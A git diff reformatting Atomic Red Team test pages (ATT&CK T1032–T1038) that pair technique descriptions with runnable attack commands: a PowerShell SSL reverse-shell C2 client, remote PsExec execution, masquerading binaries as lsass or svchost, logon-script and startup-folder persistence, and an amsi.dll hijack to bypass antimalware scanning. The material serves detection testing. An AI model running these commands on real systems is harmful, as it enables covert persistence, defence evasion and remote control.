diff --git a/Atomic_Threat_Coverage/Triggers/T1032.md b/Atomic_Threat_Coverage/Triggers/T1032.md index 08b6e2bb..3de1a9d6 100644 --- a/Atomic_Threat_Coverage/Triggers/T1032.md +++ b/Atomic_Threat_Coverage/Triggers/T1032.md @@ -1,15 +1,17 @@ # T1032 - Standard Cryptographic Protocol + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1032) +
Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.
## Atomic Tests - [Atomic Test #1 - OpenSSL C2](#atomic-test-1---openssl-c2) -
## Atomic Test #1 - OpenSSL C2 + Thanks to @OrOneEqualsOne for this quick C2 method. This is to test to see if a C2 session can be established using an SSL socket. More information about this technique, including how to set up the listener, can be found here: @@ -19,18 +21,14 @@ Upon successful execution, powershell will make a network connection to 127.0.0. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | server_ip | IP of the external server | String | 127.0.0.1| | server_port | The port to connect to on the external server | String | 443| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell $server_ip = #{server_ip} @@ -51,9 +49,4 @@ $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()} ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1033.md b/Atomic_Threat_Coverage/Triggers/T1033.md index 276e9ab1..e9c83955 100644 --- a/Atomic_Threat_Coverage/Triggers/T1033.md +++ b/Atomic_Threat_Coverage/Triggers/T1033.md @@ -1,8 +1,17 @@ # T1033 - System Owner/User Discovery + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1033) +
### Windows -Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. +Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a +system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames +or by using [Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a +number of different ways using other Discovery techniques, because user and username details are prevalent throughout a +system and include running process ownership, file/directory ownership, session information, and system logs. +Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during +automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or +attempts specific actions. ### Mac @@ -18,28 +27,25 @@ On Linux, the currently logged in user can be identified with w and - [Atomic Test #2 - System Owner/User Discovery](#atomic-test-2---system-owneruser-discovery) -
## Atomic Test #1 - System Owner/User Discovery + Identify System owner or users on an endpoint. -Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. +Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will +be via stdout. Additionally, two files will be written to disk - computers.txt and usernames.txt. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | computer_name | Name of remote computer | string | localhost| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd cmd.exe /C whoami @@ -52,27 +58,18 @@ for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active @FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt ``` - - - - -

## Atomic Test #2 - System Owner/User Discovery + Identify System owner or users on an endpoint Upon successful execution, sh will stdout list of usernames. **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh users @@ -80,9 +77,4 @@ w who ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1035.md b/Atomic_Threat_Coverage/Triggers/T1035.md index 0d1ec129..67e093c8 100644 --- a/Atomic_Threat_Coverage/Triggers/T1035.md +++ b/Atomic_Threat_Coverage/Triggers/T1035.md @@ -1,5 +1,7 @@ # T1035 - Service Execution + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1035) +
Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with [New Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.
## Atomic Tests @@ -8,28 +10,26 @@ - [Atomic Test #2 - Use PsExec to execute a command on a remote host](#atomic-test-2---use-psexec-to-execute-a-command-on-a-remote-host) -
## Atomic Test #1 - Execute a Command as a Service -Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly. - -Upon successful execution, cmd.exe create a new service using sc.exe create that will start powershell.exe to create a new file `art-marker.txt` - -**Supported Platforms:** Windows +Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the +service will report that it did not start correctly even when code executes properly. +Upon successful execution, cmd.exe create a new service using sc.exe create that will start powershell.exe to create a +new file `art-marker.txt` +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | service_name | Name of service to create | string | ARTService| | executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd sc.exe create #{service_name} binPath= #{executable_command} @@ -37,49 +37,44 @@ sc.exe start #{service_name} sc.exe delete #{service_name} ``` - - - - -

## Atomic Test #2 - Use PsExec to execute a command on a remote host + Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments Will run a command on a remote host. -Upon successful execution, powershell will download psexec.exe and spawn calc.exe on a remote endpoint (default:localhost). +Upon successful execution, powershell will download psexec.exe and spawn calc.exe on a remote endpoint (default: +localhost). **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | psexec_exe | Path to PsExec | string | C:\PSTools\PsExec.exe| | remote_host | Remote hostname or IP address | string | localhost| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell #{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe" ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) + ##### Check Prereq Commands: + ```powershell if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} ``` + ##### Get Prereq Commands: + ```powershell Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -87,7 +82,4 @@ New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1036.md b/Atomic_Threat_Coverage/Triggers/T1036.md index 9aed0704..51580a25 100644 --- a/Atomic_Threat_Coverage/Triggers/T1036.md +++ b/Atomic_Threat_Coverage/Triggers/T1036.md @@ -1,22 +1,49 @@ # T1036 - Masquerading -## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1036) -
Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed. -One variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. An example of this is when a common system utility or program is moved and renamed to avoid detection based on its usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate. +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1036) -A third variant uses the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver file named March 25 \u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\u202Egnp.js will be displayed as photo_high_resj.png. A common use of this technique is with spearphishing attachments since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.  +
Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed. -Adversaries may modify a binary's metadata, including such fields as icons, version, name of the product, description, and copyright, to better blend in with the environment and increase chances of deceiving a security analyst or product.(Citation: Threatexpress MetaTwin 2017) +One variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted +program. Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. +An example of this is when a common system utility or program is moved and renamed to avoid detection based on its +usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or +path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name +with something that is thought to be legitimate. + +A third variant uses the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into +executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that +causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a +Windows screensaver file named March 25 \u202Excod.scr will display as March 25 rcs.docx. A +JavaScript file named photo_high_re\u202Egnp.js will be displayed as photo_high_resj.png. A +common use of this technique is with spearphishing attachments since it can trick both end users and defenders if they +are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many +targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber +Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the +command line tool reg.exe does not by default. + +Adversaries may modify a binary's metadata, including such fields as icons, version, name of the product, description, +and copyright, to better blend in with the environment and increase chances of deceiving a security analyst or product.( +Citation: Threatexpress MetaTwin 2017) ### Windows -In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke) -An example of abuse of trusted locations in Windows would be the C:\Windows\System32 directory. Examples of trusted binary names that can be given to malicious binares include "explorer.exe" and "svchost.exe". +In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as +rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a +different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. ( +Citation: F-Secure CozyDuke) + +An example of abuse of trusted locations in Windows would be the C:\Windows\System32 directory. Examples of +trusted binary names that can be given to malicious binares include "explorer.exe" and "svchost.exe". ### Linux -Another variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten) -An example of abuse of trusted locations in Linux would be the /bin directory. Examples of trusted binary names that can be given to malicious binaries include "rsyncd" and "dbus-inotifier". (Citation: Fysbis Palo Alto Analysis) (Citation: Fysbis Dr Web Analysis)
+Another variation of this technique includes malicious binaries changing the name of their running process to that of a +trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten) + +An example of abuse of trusted locations in Linux would be the /bin directory. Examples of trusted binary +names that can be given to malicious binaries include "rsyncd" and "dbus-inotifier". (Citation: Fysbis Palo Alto +Analysis) (Citation: Fysbis Dr Web Analysis)
## Atomic Tests @@ -36,22 +63,18 @@ An example of abuse of trusted locations in Linux would be the /bin ## Atomic Test #1 - Masquerading as Windows LSASS process + Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. -Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session +Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second +timeout cancels the session **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe @@ -59,57 +82,41 @@ copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe ``` #### Cleanup Commands: + ```cmd del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 ``` - - - -

## Atomic Test #2 - Masquerading as Linux crond process. + Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon. Upon successful execution, sh is renamed to `crond` and executed. **Supported Platforms:** Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh cp /bin/sh /tmp/crond /tmp/crond ``` - - - - -

## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe + Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y @@ -117,30 +124,23 @@ cmd.exe /c %APPDATA%\notepad.exe /B ``` #### Cleanup Commands: + ```cmd del /Q /F %APPDATA%\notepad.exe >nul 2>&1 ``` - - - -

## Atomic Test #4 - Masquerading - wscript.exe running as svchost.exe + Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe. Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y @@ -148,30 +148,23 @@ cmd.exe /c %APPDATA%\svchost.exe /B ``` #### Cleanup Commands: + ```cmd del /Q /F %APPDATA%\svchost.exe >nul 2>&1 ``` - - - -

## Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe + Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe. Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y @@ -179,36 +172,30 @@ cmd.exe /K %APPDATA%\taskhostw.exe ``` #### Cleanup Commands: + ```cmd del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 ``` - - - -

## Atomic Test #6 - Masquerading - non-windows exe running as windows exe + Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe Upon successful execution, powershell will execute T1036.exe as svchost.exe from on a non-standard path. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | inputfile | path of file to copy | path | PathToAtomicsFolder\T1036\bin\t1036.exe| | outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe")| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell copy #{inputfile} #{outputfile} @@ -217,47 +204,45 @@ Stop-Process -ID $myT1036 ``` #### Cleanup Commands: + ```powershell Remove-Item #{outputfile} -Force -ErrorAction Ignore ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Exe file to copy must exist on disk at specified location (#{inputfile}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{inputfile}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/t1036.exe" -OutFile "#{inputfile}" ``` - - -

## Atomic Test #7 - Masquerading - windows exe running as different windows exe + Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | inputfile | path of file to copy | path | $env:ComSpec| | outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe")| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell copy #{inputfile} #{outputfile} @@ -266,18 +251,16 @@ Stop-Process -ID $myT1036 ``` #### Cleanup Commands: + ```powershell Remove-Item #{outputfile} -Force -ErrorAction Ignore ``` - - - -

## Atomic Test #8 - Malicious process Masquerading as LSM.exe + Detect LSM running from an incorrect directory and an incorrect service account This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder. @@ -285,12 +268,7 @@ Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd copy C:\Windows\System32\cmd.exe C:\lsm.exe @@ -298,13 +276,10 @@ C:\lsm.exe /c echo T1036 > C:\T1036.txt ``` #### Cleanup Commands: + ```cmd del C:\T1036.txt >nul 2>&1 del C:\lsm.exe >nul 2>&1 ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1037.md b/Atomic_Threat_Coverage/Triggers/T1037.md index 50139ce9..48a43ceb 100644 --- a/Atomic_Threat_Coverage/Triggers/T1037.md +++ b/Atomic_Threat_Coverage/Triggers/T1037.md @@ -1,14 +1,24 @@ # T1037 - Logon Scripts + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1037) +
### Windows -Windows allows logon scripts to be run whenever a specific user or group of users log into a system. (Citation: TechNet Logon Scripts) The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. +Windows allows logon scripts to be run whenever a specific user or group of users log into a system. (Citation: TechNet +Logon Scripts) The scripts can be used to perform administrative functions, which may often execute other programs or +send information to an internal logging server. -If adversaries can access these scripts, they may insert additional code into the logon script to execute their tools when a user logs in. This code can allow them to maintain persistence on a single system, if it is a local script, or to move laterally within a network, if the script is stored on a central server and pushed to many systems. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. +If adversaries can access these scripts, they may insert additional code into the logon script to execute their tools +when a user logs in. This code can allow them to maintain persistence on a single system, if it is a local script, or to +move laterally within a network, if the script is stored on a central server and pushed to many systems. Depending on +the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. ### Mac -Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root (Citation: creating login hook). There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in.
+Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook +tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as +root (Citation: creating login hook). There can only be one login hook at a time though. If adversaries can access these +scripts, they can insert additional code to the script to execute their tools when a user logs in.
## Atomic Tests @@ -24,27 +34,24 @@ Mac allows login and logoff hooks to be run as root whenever a specific user log - [Atomic Test #6 - Supicious bat file run from startup Folder](#atomic-test-6---supicious-bat-file-run-from-startup-folder) -
## Atomic Test #1 - Logon Scripts -Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key + +Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new +environment variable in the HKCU\Environment key that can be viewed in the Registry Editor. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_path | Path to .bat file | String | %temp%\art.bat| | script_command | Command To Execute | String | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037-log.txt| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd echo "#{script_command}" > #{script_path} @@ -52,31 +59,25 @@ REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_pa ``` #### Cleanup Commands: + ```cmd REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1 del #{script_path} >nul 2>&1 del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>&1 ``` - - - -

## Atomic Test #2 - Scheduled Task Startup Script -Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view + +Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled +tasks. To view the tasks, open the Task Scheduler and look in the Active Tasks pane. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd schtasks /create /tn "T1037_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" @@ -84,65 +85,52 @@ schtasks /create /tn "T1037_OnStartup" /sc onstart /ru system /tr "cmd.exe /c ca ``` #### Cleanup Commands: + ```cmd schtasks /delete /tn "T1037_OnLogon" /f >nul 2>&1 schtasks /delete /tn "T1037_OnStartup" /f >nul 2>&1 ``` - - - -

## Atomic Test #3 - Logon Scripts - Mac + Mac logon script **Supported Platforms:** macOS +#### Run it with these steps! - - -#### Run it with these steps! 1. Create the required plist file - sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist + sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist 2. Populate the plist with the location of your shell script - sudo defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh + sudo defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh 3. Create the required plist file in the target user's Preferences directory - touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist + touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist 4. Populate the plist with the location of your shell script - defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh - - - - - - + defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh

## Atomic Test #4 - Supicious vbs file run from startup Folder -vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1137 Hello, World VBS!" will be displayed twice. + +vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1137 Hello, World +VBS!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Copy-Item $PathToAtomicsFolder\T1037\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" @@ -152,32 +140,25 @@ cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbssta ``` #### Cleanup Commands: + ```powershell Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore ``` - - - -

## Atomic Test #5 - Supicious jse file run from startup Folder + jse files can be placed in and ran from the startup folder to maintain persistance. -Upon execution, "T1137 Hello, World JSE!" will be displayed twice. +Upon execution, "T1137 Hello, World JSE!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Copy-Item $PathToAtomicsFolder\T1037\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" @@ -187,31 +168,25 @@ cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sta ``` #### Cleanup Commands: + ```powershell Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore ``` - - - -

## Atomic Test #6 - Supicious bat file run from startup Folder + bat files can be placed in and executed from the startup folder to maintain persistance. -Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" +Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env: +APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Copy-Item $PathToAtomicsFolder\T1037\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" @@ -221,13 +196,10 @@ Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\bats ``` #### Cleanup Commands: + ```powershell Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1038.md b/Atomic_Threat_Coverage/Triggers/T1038.md index 923e61cf..f6cae0dd 100644 --- a/Atomic_Threat_Coverage/Triggers/T1038.md +++ b/Atomic_Threat_Coverage/Triggers/T1038.md @@ -1,36 +1,45 @@ # T1038 - DLL Search Order Hijacking + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1038) +
Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence. -Adversaries may perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft 2269637) Adversaries may use this behavior to cause the program to load a malicious DLL. +Adversaries may perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by +placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before +the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks +occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. ( +Citation: Microsoft 2269637) Adversaries may use this behavior to cause the program to load a malicious DLL. -Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation. (Citation: Microsoft DLL Redirection) (Citation: Microsoft Manifests) (Citation: Mandiant Search Order) +Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest +or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence +or privilege escalation. (Citation: Microsoft DLL Redirection) (Citation: Microsoft Manifests) (Citation: Mandiant +Search Order) -If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. +If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL +that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege +escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. -Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
+Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to +also load the legitimate DLLs they were meant to replace. ## Atomic Tests - [Atomic Test #1 - DLL Search Order Hijacking - amsi.dll](#atomic-test-1---dll-search-order-hijacking---amsidll) -
## Atomic Test #1 - DLL Search Order Hijacking - amsi.dll -Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface) + +Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in +order to bypass AMSI (Anti-Malware Scanning Interface) https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ -Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path. +Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a +non-standard path. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe @@ -39,13 +48,10 @@ copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll ``` #### Cleanup Commands: + ```cmd del %APPDATA%\updater.exe >nul 2>&1 del %APPDATA%\amsi.dll >nul 2>&1 ``` - - - -
